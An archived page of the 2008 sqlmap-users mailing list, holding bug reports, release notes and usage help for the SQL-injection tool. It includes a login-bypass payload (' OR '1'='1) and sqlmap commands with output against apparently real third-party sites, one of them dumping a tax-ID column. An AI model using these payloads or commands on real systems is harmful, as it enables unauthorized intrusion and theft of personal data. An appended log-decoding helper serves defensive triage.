sqlmap-users Mailing List for sqlmap (Page 144)
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-10 19:11:15
Hi Gabriel,

Gabriel eu wrote:
> ...
> I would like to know if there is a chance that sqlmap will support
> interbase and/or microsoft access in the future.

Yes, there is a chance in the long run.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 19:03:15
Hi Andres,

Andres Riancho wrote:
> ...
> Feature request: let the users access the svn, so they can download
> the latest updates and test if the patches you apply to the software
> really work for them. In this way, users won't have to wait for the next
> release to be able to test it =)

sqlmap Subversion repository is now online on
https://svn.sqlmap.org/sqlmap/trunk/sqlmap/

You can checkout it if you want to give a try to the development version.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 15:16:24
Hi Gabriel,

I recently fixed this bug, it will be on sqlmap 0.6.3.
As a short-term workaround do not provide the column name for the moment.

Cheers,
Bernardo

Gabriel eu wrote:
>
> ./sqlmap.py -u "http://www.abp.com.br/namidia/index.asp?id=857"
> --dbms="Mysql" -D abp1 -T tblassociados -C txtCNPJOuCPF -v1 -p id --dump
>
> sqlmap version: 0.6.2
> Python version: 2.5
> Operating system: linux2
> Traceback (most recent call last):
>   File "./sqlmap.py", line 74, in main
>     start()
>   File "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/lib/controller/controller.py", line 239, in start
>     action()
>   File "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/lib/controller/action.py", line 106, in action
>     dumper.dbTableValues(conf.dbmsHandler.dumpTable())
>   File "/home/gabriel/exploits/sql_injection/sqlmap-0.6.2/plugins/generic/enumeration.py", line 829, in dumpTable
>     for column in colList:
> UnboundLocalError: local variable 'colList' referenced before assignment

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Andres R. <and...@gm...> - 2008-11-09 14:47:40
Bernardo,

On Sun, Nov 9, 2008 at 12:36 PM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi Kyprianos,
>
> I am catching this exception now. It will be into sqlmap 0.6.3.
> Thanks for notifying the issue.

Feature request: let the users access the svn, so they can download
the latest updates and test if the patches you apply to the software
really work for them. In this way, users won't have to wait for the next
release to be able to test it =)

> Cheers,
> Bernardo
>
> Kyprianos Vassilopoulos wrote:
>> ...
>> ERROR] unhandled exception
>> in sqlm
>> ap/0.6.2, please copy the command line and the following text and send
>> by e-mail
>> to ber...@gm... <mailto:ber...@gm...>. I will
>> fix it as soon as possible:
>> sqlmap version: 0.6.2
>> Python version: 2.5.2
>> Operating system: win32
>> Traceback (most recent call last):
>>   File "sqlmap.py", line 74, in main
>>   File "lib\controller\controller.pyc", line 239, in start
>>   File "lib\controller\action.pyc", line 90, in action
>>   File "plugins\generic\enumeration.pyc", line 207, in getPasswordHashes
>>   File "plugins\generic\enumeration.pyc", line 151, in getUsers
>>   File "lib\request\inject.pyc", line 379, in getValue
>>   File "lib\request\inject.pyc", line 284, in __goInferenceProxy
>>   File "lib\request\inject.pyc", line 89, in __goInferenceFields
>>   File "lib\request\inject.pyc", line 65, in __goInference
>>   File "lib\techniques\inference\blind.pyc", line 188, in bisection
>>   File "lib\techniques\inference\blind.pyc", line 97, in getChar
>>   File "lib\request\connect.pyc", line 224, in queryPage
>>   File "lib\request\connect.pyc", line 143, in getPage
>>   File "socket.pyc", line 291, in read
>>   File "httplib.pyc", line 509, in read
>>   File "httplib.pyc", line 554, in _read_chunked
>>   File "httplib.pyc", line 602, in _safe_read
>>   File "socket.pyc", line 309, in read
>> error: (10054, 'Connection reset by peer')
>>
>> [*] shutting down at: 02:12:44
>
>
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
> PGP Key ID: 0x05F5A30F
>
> -------------------------------------------------------------------------
> This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
> Build the coolest Linux based applications with Moblin SDK & win great prizes
> Grand prize is a trip for two to an Open Source event anywhere in the world
> http://moblin-contest.org/redirect.php?banner_id=100&url=/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-09 14:36:40
Hi Kyprianos,

I am catching this exception now. It will be into sqlmap 0.6.3.
Thanks for notifying the issue.

Cheers,
Bernardo

Kyprianos Vassilopoulos wrote:
> ...
> ERROR] unhandled exception
> in sqlm
> ap/0.6.2, please copy the command line and the following text and send
> by e-mail
> to ber...@gm... <mailto:ber...@gm...>. I will
> fix it as soon as possible:
> sqlmap version: 0.6.2
> Python version: 2.5.2
> Operating system: win32
> Traceback (most recent call last):
>   File "sqlmap.py", line 74, in main
>   File "lib\controller\controller.pyc", line 239, in start
>   File "lib\controller\action.pyc", line 90, in action
>   File "plugins\generic\enumeration.pyc", line 207, in getPasswordHashes
>   File "plugins\generic\enumeration.pyc", line 151, in getUsers
>   File "lib\request\inject.pyc", line 379, in getValue
>   File "lib\request\inject.pyc", line 284, in __goInferenceProxy
>   File "lib\request\inject.pyc", line 89, in __goInferenceFields
>   File "lib\request\inject.pyc", line 65, in __goInference
>   File "lib\techniques\inference\blind.pyc", line 188, in bisection
>   File "lib\techniques\inference\blind.pyc", line 97, in getChar
>   File "lib\request\connect.pyc", line 224, in queryPage
>   File "lib\request\connect.pyc", line 143, in getPage
>   File "socket.pyc", line 291, in read
>   File "httplib.pyc", line 509, in read
>   File "httplib.pyc", line 554, in _read_chunked
>   File "httplib.pyc", line 602, in _safe_read
>   File "socket.pyc", line 309, in read
> error: (10054, 'Connection reset by peer')
>
> [*] shutting down at: 02:12:44

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Zinho <zi...@ha...> - 2008-11-08 19:13:08
Hi Bernardo ( ;) I'm Italian too)

Following up with the response you gave to Dan about injection in login form
I have tried to put

test'+OR+'1'='1');--

in the data parameter (because this is the way to bypass the auth through sqli
and get the string) but I receive

[ERROR] all testable parameters you provided are not present within t
he GET, POST and Cookie parameters

It seems that the problem is in the '=' character in the data parameter.
I tried it both using sqlmap.conf and inline parameters with no luck.

Any suggestion on this will be very appreciated.

--
----
Zinho
Webmaster and Founder
Hackers Center Internet Security Portal
www.hackerscenter.com
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-06 09:53:31
Fixed in 0.6.2, get it from official site as usual.

On Wed, Nov 5, 2008 at 22:58, x3k9975 <x3...@gm...> wrote:
> [20:57:13] [ERROR] unhandled exception in sqlmap/0.6.1, please copy the
> command line and the following text and send by e-mail to
> ber...@gm.... I will fix it as soon as possible:
> sqlmap version: 0.6.1
> Python version: 2.5.1
> Operating system: linux2
> Traceback (most recent call last):
>   File "/usr/bin/sqlmap", line 74, in main
>     start()
>   File "/usr/share/sqlmap/lib/controller/controller.py", line 239, in start
>     action()
>   File "/usr/share/sqlmap/lib/controller/action.py", line 69, in action
>     print "back-end DBMS:\t%s\n" % conf.dbmsHandler.getFingerprint()
>   File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 179, in getFingerprint
>     comVer = self.__commentCheck()
>   File "/usr/share/sqlmap/plugins/dbms/mysql.py", line 160, in __commentCheck
>     midVer = prevVer[2]
> TypeError: 'NoneType' object is unsubscriptable

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-04 16:56:48
Hi,

I am glad to release sqlmap 0.6.2.
Thanks to anyone of you that contributed with really appreciated and useful feedback.

Changes
=======

Some of the new features include:

* Major bug fix to correctly dump tables entries when --stop is not specified;
* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
* Major bug fix to correctly update sqlmap to the latest stable release with command line --update;
* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.2-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.2_exe.zip

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-02 19:24:52
Hi Dan,

Change the parameters to something similar to:

username=test'+OR+'1'='1
password=test'+OR+'1'='1

and find the string which differs in the page content depending on the
valid and not valid login, then provide the valid string with --string
option. Refer to the sqlmap user's manual for details on --string
command line option.

Cheers,
Bernardo

Dan Guido wrote:
> Hi Bernardo, Daniele,
>
> If I've located a SQL injection in the login form of a website, how
> should I configure sqlmap to exploit it if I don't know the username
> and password of a valid user? The page always fails the sqlmap
> "dynamic" check because I can't get valid authentication credentials,
> however, a SQL error is clearly displayed to the screen.
>
> Thanks.
>
> --
> Dan Guido

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-11-02 14:32:47
Actually the --start option is broken in sqlmap 0.6.1.
I will release soon version 0.6.2 with this and a few other bug fixes.

barry smith wrote:
> Hello,
>
> I'm missing a feature in your software. I have a bad connection that
> breaks often. I want to use --start when enumerating columns like this
> "--columns -T table -D database --start 40". My attempts to modify
> sqlmap have been futile, but I'm a newbie with python so it was to be
> expected. Could you tell me if it's possible without a lot of fuss to
> edit sqlmap to include this feature? Is there a file that I can set the
> column enumerating start limit to a value other than 0 without affecting
> the other start limits? Thank you for your time.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: barry s. <ket...@ya...> - 2008-11-02 07:44:08
Hello,

I'm missing a feature in your software. I have a bad connection that breaks often. I want to use --start when enumerating columns like this "--columns -T table -D database --start 40". My attempts to modify sqlmap have been futile, but I'm a newbie with python so it was to be expected. Could you tell me if it's possible without a lot of fuss to edit sqlmap to include this feature? Is there a file that I can set the column enumerating start limit to a value other than 0 without affecting the other start limits?

Thank you for your time.
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-24 10:56:53
Hi Andres,

On Tue, Oct 21, 2008 at 14:51, Andres Riancho <and...@gm...> wrote:
> ...
> Maybe you could define that as a default for postgresql?
> Something like...
>
> $ ./sqlmap ... --enumerate-tables
> ...
> fingerprinted as postgresql
> ...
> you didn't specified the table name, using "public" as default.
> ...
> working... results:
> $

Good point. It will be implemented in sqlmap 0.7.

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 15:12:34
Hi Freeman,

On Wed, Oct 22, 2008 at 09:33, Freeman Y. <fre...@la...> wrote:
> ...
> Sorry I was mistaken, I thought that if I had the DB name then it could
> enumerate the tables with -D tablename and --tables even if MySQL is < 5.0.

I will improve it in sqlmap 0.7.
For the moment no table/column enumeration is possible on MySQL < 5.0
even if you provide the DB name.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-22 08:55:06
Hi Freeman,

On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
> ...
> [...]
> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
> [16:36:06] [INFO] retrieved:
> [16:36:11] [INFO] performed 6 queries in 5 seconds
> back-end DBMS: MySQL < 5.0.0
>
> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL
> < 5.
> 0
>
> [*] shutting down at: 16:36:11
>
> If you look I did use -D and then --tables. What am I doing wrong?

As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so
it has not information_schema. If you assume it is MySQL >= 5.0 so the
current user does not have access to the information_schema system
database.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: Freeman Y. <fre...@la...> - 2008-10-22 08:37:45
Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
>
>> ...
>> [...]
>> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
>> [16:36:06] [INFO] retrieved:
>> [16:36:11] [INFO] performed 6 queries in 5 seconds
>> back-end DBMS: MySQL < 5.0.0
>>
>> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL
>> < 5.
>> 0
>>
>> [*] shutting down at: 16:36:11
>>
>> If you look I did use -D and then --tables. What am I doing wrong?
>>
>
> As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so
> it has not information_schema. If you assume it is MySQL >= 5.0 so the
> current user does not have access to the information_schema system
> database.
>
> Cheers,
>

Sorry I was mistaken, I thought that if I had the DB name then it could enumerate the tables with -D tablename and --tables even if MySQL is < 5.0.

Do you have any suggestions as how to attack this type of DB then? I'm somewhat new to SQL injections, please bear with me :)

Thanks for your help!
From: Freeman Y. <fre...@la...> - 2008-10-21 23:40:46
Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
>
>> Am I still not able to enumerate tables in a DB even though i have the
>> DB name in MySQL 5.0.0?
>>
>
> In a default configuration of MySQL >= 5.0 there is the
> information_schema system database which sqlmap uses to enumerate DB,
> tables, etc.
>
>
>> I understand that I cannot get a list of DBs because of no
>> information_schema, but even if I have a DB name I cannot enumerate the
>> tables?
>> If not, how else can I attack a 5.0.0 server?
>>
>
> If you read the documentation carefully, or even just run sqlmap with
> -h option, you see that you can provide the DB name with -D option
> together with the --tables option to enumerate its tables.
>
> Cheers,
>

Thanks but I already tried that. Here's the output with the site removed:

/C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --curre
nt-db --current-user

sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 16:26:47

[16:26:47] [INFO] testing connection to the target url
[...]
back-end DBMS: MySQL < 5.0.0

[16:27:42] [INFO] fetching current user
[16:27:42] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), CHAR(32))
[16:27:42] [INFO] retrieved: hyweljen_db@localhost
[16:30:33] [INFO] performed 153 queries in 171 seconds
current user: 'hyweljen_db@localhost'

[16:30:33] [INFO] fetching current database
[16:30:33] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[16:30:33] [INFO] retrieved: hyweljen_diverse
[16:32:38] [INFO] performed 118 queries in 125 seconds
current database: 'hyweljen_diverse'

[16:32:38] [INFO] Fetched data logged to text files under 'C:\sqlmap/output\randomsite'

[*] shutting down at: 16:32:38/

So I've found out that the database is hyweljen_diverse.. then I run this:

/ C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --eta -
-threads=2 -D hyweljen_diverse --tables

sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 16:35:20

[16:35:20] [INFO] testing connection to the target url
[...]
[16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
[16:36:06] [INFO] retrieved:
[16:36:11] [INFO] performed 6 queries in 5 seconds
back-end DBMS: MySQL < 5.0.0

[16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL < 5.
0

[*] shutting down at: 16:36:11/

If you look I did use -D and then --tables. What am I doing wrong?

Thanks
From: Andres R. <and...@gm...> - 2008-10-21 13:52:03
Bernardo,

On Tue, Oct 21, 2008 at 6:34 AM, Bernardo Damele A. G. <ber...@gm...> wrote:
> Hi,
>
> On Tue, Oct 21, 2008 at 08:09, v4d25f7gb2e7 tgb4sr02be24
> <ve7...@gm...> wrote:
>> ...
>> C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte
>> st.php?id=1" -s c:\resume.log -D database1 --tables
>>
>> sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
>> and Daniele Bellucci <dan...@gm...>
>>
>> [*] starting at: 15:54:37
>>
>> [15:54:37] [INFO] resuming injection point 'GET' from session file
>> [15:54:37] [INFO] resuming injection parameter 'id' from session file
>> [15:54:37] [INFO] resuming injection type 'numeric' from session file
>> [15:54:37] [INFO] resuming 0 number of parenthesis from session file
>> [15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
>> [15:54:37] [INFO] testing connection to the target url
>> back-end DBMS: PostgreSQL
>>
>> [15:54:38] [INFO] fetching tables for database 'database1'
>> [15:54:38] [INFO] fetching number of tables for database 'database1'
>> [15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000
>> 0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH
>> R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49))
>> [15:54:38] [INFO] retrieved: 0
>> [15:54:40] [INFO] performed 13 queries in 1 seconds
>> [15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab
>> ase1'
>> [15:54:40] [ERROR] unable to retrieve the tables for any database
>
> As you can read from sqlmap documentation online[1] or on the doc/ folder:
>
> "Note that on PostgreSQL you have to provide public or the name of a
> system database because it is not possible to enumerate other
> databases tables, only the users' schema that the web application's
> user is connected to, which is always public."
>
> So on PostgreSQL if you want to retrieve the tables for the current
> database provide 'public' as DB name.
>
> On others DBMS it works. Refer to sqlmap documentation examples.

Maybe you could define that as a default for postgresql?
Something like...

$ ./sqlmap ... --enumerate-tables
...
fingerprinted as postgresql
...
you didn't specified the table name, using "public" as default.
...
working... results:
$

> [1] http://sqlmap.sourceforge.net/doc/README.html#ss5.4
>
> Cheers,
> --
> Bernardo Damele A. G.
>
> E-mail / Jabber: bernardo.damele (at) gmail.com
> Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
> PGP Key ID: 0x05F5A30F
>
> -------------------------------------------------------------------------
> This SF.Net email is sponsored by the Moblin Your Move Developer's challenge
> Build the coolest Linux based applications with Moblin SDK & win great prizes
> Grand prize is a trip for two to an Open Source event anywhere in the world
> http://moblin-contest.org/redirect.php?banner_id=100&url=/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:45:05
Hi,

On Tue, Oct 21, 2008 at 08:09, v4d25f7gb2e7 tgb4sr02be24
<ve7...@gm...> wrote:
> ...
> C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte
> st.php?id=1" -s c:\resume.log -D database1 --tables
>
> sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
> and Daniele Bellucci <dan...@gm...>
>
> [*] starting at: 15:54:37
>
> [15:54:37] [INFO] resuming injection point 'GET' from session file
> [15:54:37] [INFO] resuming injection parameter 'id' from session file
> [15:54:37] [INFO] resuming injection type 'numeric' from session file
> [15:54:37] [INFO] resuming 0 number of parenthesis from session file
> [15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
> [15:54:37] [INFO] testing connection to the target url
> back-end DBMS: PostgreSQL
>
> [15:54:38] [INFO] fetching tables for database 'database1'
> [15:54:38] [INFO] fetching number of tables for database 'database1'
> [15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000
> 0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH
> R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49))
> [15:54:38] [INFO] retrieved: 0
> [15:54:40] [INFO] performed 13 queries in 1 seconds
> [15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab
> ase1'
> [15:54:40] [ERROR] unable to retrieve the tables for any database

As you can read from sqlmap documentation online[1] or on the doc/ folder:

"Note that on PostgreSQL you have to provide public or the name of a
system database because it is not possible to enumerate other
databases tables, only the users' schema that the web application's
user is connected to, which is always public."

So on PostgreSQL if you want to retrieve the tables for the current
database provide 'public' as DB name.

On others DBMS it works. Refer to sqlmap documentation examples.

[1] http://sqlmap.sourceforge.net/doc/README.html#ss5.4

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
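Added example (not part of the thread and not sqlmap code): a small log-reading helper that re-joins the console-wrapped query quoted in the message above, decodes its CHR(n)||CHR(n) chain back into the literal, and reports which catalog the query reads and which schemaname it filters on. It shows why the count came back 0: the filter is 'database1', not 'public'. The function names are hypothetical and the log format is assumed to be the one shown in the message.

```python
import re

# Log lines as quoted in the message above, including the 80-column console
# wraps that split tokens ("1000" / "0", "CH" / "R(97)").
SAMPLE_LOG = """\
[15:54:38] [INFO] fetching number of tables for database 'database1'
[15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000
0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH
R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49))
[15:54:38] [INFO] retrieved: 0
"""

LOG_PREFIX = re.compile(r"^\[\d{2}:\d{2}:\d{2}\] \[(\w+)\] (.*)$")
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*", re.IGNORECASE)
CHR_ITEM = re.compile(r"CHR\((\d+)\)", re.IGNORECASE)
SCHEMA_EQ = re.compile(r"schemaname=\(?(CHR\(\d+\)(?:\|\|CHR\(\d+\))*)",
                       re.IGNORECASE)
# System catalogs whose presence in an application-issued query deserves a look.
CATALOGS = ("pg_tables", "pg_catalog", "information_schema")


def _compact(sql):
    """Drop all whitespace so tokens broken by line wrapping match again."""
    return re.sub(r"\s+", "", sql)


def _decode(chain):
    """Turn one CHR(..)||CHR(..) chain into the string it spells."""
    return "".join(chr(int(n)) for n in CHR_ITEM.findall(chain))


def join_records(log_text):
    """Attach wrapped continuation lines to the timestamped record before them."""
    records = []
    for line in log_text.splitlines():
        m = LOG_PREFIX.match(line)
        if m:
            records.append([m.group(1), m.group(2)])
        elif records:
            # A hard wrap carries no separator, so join without adding one.
            records[-1][1] += line
    return [(level, msg) for level, msg in records]


def decode_chr_chains(sql, min_len=2):
    """Return the string literals hidden in CHR() concatenation chains.

    Single CHR(32)-style padding values are skipped by default (min_len=2).
    """
    literals = []
    for chain in CHR_CHAIN.finditer(_compact(sql)):
        text = _decode(chain.group(0))
        if len(text) >= min_len:
            literals.append(text)
    return literals


def schema_filter(sql):
    """Return the decoded value compared against schemaname, or None."""
    m = SCHEMA_EQ.search(_compact(sql))
    return _decode(m.group(1)) if m else None


def triage(log_text):
    """Summarise every logged query: catalogs touched and decoded literals."""
    findings = []
    for _level, msg in join_records(log_text):
        if not msg.startswith("query:"):
            continue
        sql = msg[len("query:"):].strip()
        lowered = _compact(sql).lower()
        findings.append({
            "catalogs": [c for c in CATALOGS if c in lowered],
            "literals": decode_chr_chains(sql),
            "schema_filter": schema_filter(sql),
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

The same decoding applies when a statement built this way shows up in a server-side statement log; a CHR() chain next to a system catalog name is a useful review trigger because ordinary application queries rarely contain one.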
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-21 08:37:06
Hi Freeman,

On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
> Am I still not able to enumerate tables in a DB even though i have the
> DB name in MySQL 5.0.0?

In a default configuration of MySQL >= 5.0 there is the
information_schema system database which sqlmap uses to enumerate DB,
tables, etc.

> I understand that I cannot get a list of DBs because of no
> information_schema, but even if I have a DB name I cannot enumerate the
> tables?
> If not, how else can I attack a 5.0.0 server?

If you read the documentation carefully, or even just run sqlmap with
-h option, you see that you can provide the DB name with -D option
together with the --tables option to enumerate its tables.

Cheers,
--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F
From: v4d25f7gb2e7 t. <ve7...@gm...> - 2008-10-21 07:10:05
I have some troubles.

I was able to get DB names(--dbs) and current DB name(--current-db).
But I was not able to enumerate tables in current DB(-D databasename --tables).

I tried it on MS SQLServer, MySQL and PostgreSQL, on Windows and Linux.
with sqlmap 0.6.1 and 0.6
But all the results were failure.

Is this a bug?
Please give information.

log
--------------------------------------------------------------------------------
C:\My Documents\sqlmap-0.6.1_exe>sqlmap -v 2 --eta -u "http://192.168.0.31/sqlte
st.php?id=1" -s c:\resume.log -D database1 --tables

sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
and Daniele Bellucci <dan...@gm...>

[*] starting at: 15:54:37

[15:54:37] [INFO] resuming injection point 'GET' from session file
[15:54:37] [INFO] resuming injection parameter 'id' from session file
[15:54:37] [INFO] resuming injection type 'numeric' from session file
[15:54:37] [INFO] resuming 0 number of parenthesis from session file
[15:54:37] [INFO] resuming back-end DBMS 'PostgreSQL' from session file
[15:54:37] [INFO] testing connection to the target url
back-end DBMS: PostgreSQL

[15:54:38] [INFO] fetching tables for database 'database1'
[15:54:38] [INFO] fetching number of tables for database 'database1'
[15:54:38] [INFO] query: SELECT COALESCE(CAST(COUNT(tablename) AS CHARACTER(1000
0)), (CHR(32))) FROM pg_tables WHERE schemaname=(CHR(100)||CHR(97)||CHR(116)||CH
R(97)||CHR(98)||CHR(97)||CHR(115)||CHR(101)||CHR(49))
[15:54:38] [INFO] retrieved: 0
[15:54:40] [INFO] performed 13 queries in 1 seconds
[15:54:40] [WARNING] unable to retrieve the number of tables for database 'datab
ase1'
[15:54:40] [ERROR] unable to retrieve the tables for any database

[*] shutting down at: 15:54:40
From: Freeman Y. <fre...@la...> - 2008-10-21 06:17:22
Am I still not able to enumerate tables in a DB even though i have the DB name in MySQL 5.0.0?
I understand that I cannot get a list of DBs because of no information_schema, but even if I have a DB name I cannot enumerate the tables?
If not, how else can I attack a 5.0.0 server?

Thanks
From: Bernardo D. A. G. <ber...@gm...> - 2008-10-20 14:47:32
Hi,

I am glad to release sqlmap version 0.6.1.
Thanks to anyone of you that contributed with really appreciated and useful feedback.

Changes
=======

Some of the new features include:

* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
* Implemented possibility to test for and inject also on LIKE statements;
* Implemented --start and --stop options to set the first and the last table entry to dump;
* Added non-interactive/batch-mode (--batch) option to make it easy to wrap sqlmap in Metasploit and any other tool.

Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog.

Download
========

You can download it in various formats:

* Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.gz
* Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.tar.bz2
* Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1.zip
* DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6.1-1_all.deb
* RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1-1.noarch.rpm
* Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.1_exe.zip

Documentation
=============

* sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf
* sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/

Happy hacking!

--
